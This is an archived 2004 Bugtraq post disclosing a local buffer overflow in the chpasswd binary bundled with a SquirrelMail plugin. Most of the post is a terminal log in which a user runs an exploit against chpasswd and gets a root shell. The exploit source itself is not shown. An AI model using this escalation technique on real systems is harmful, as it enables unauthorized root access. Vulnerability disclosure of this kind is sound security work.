[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Squirrelmail Chpasswod bof

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Squirrelmail Chpasswod bof
From: Matias Neiff <matias@xxxxxxxxxxxx>
Date: Sat, 17 Apr 2004 04:20:26 -0300

Hi all

There is a boffer over flow in the chpasswd binary, distributed with the 
plugin. This allow to local's user to execute commands as a root.
---:::Prott:::---
root@orco:/mnt/hosting/hack/bof# su webmaster
webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=0(root) gid=3(sys) groups=500(webmaster)
sh-2.05b#
---:::end:::---

Bye all

Follow-Ups:
- Re: Squirrelmail Chpasswod bof
  - From: martin f krafft
- Re: Squirrelmail Chpasswod bof
  - From: Jonathan Angliss

Prev by Date: Re: After Ms patches last Wed ...
Next by Date: Re: After Ms patches last Wed ...
Previous by thread: [SECURITY] [DSA 486-1] New cvs packages fix multiple vulnerabilities
Next by thread: Re: Squirrelmail Chpasswod bof
Index(es):
- Date
- Thread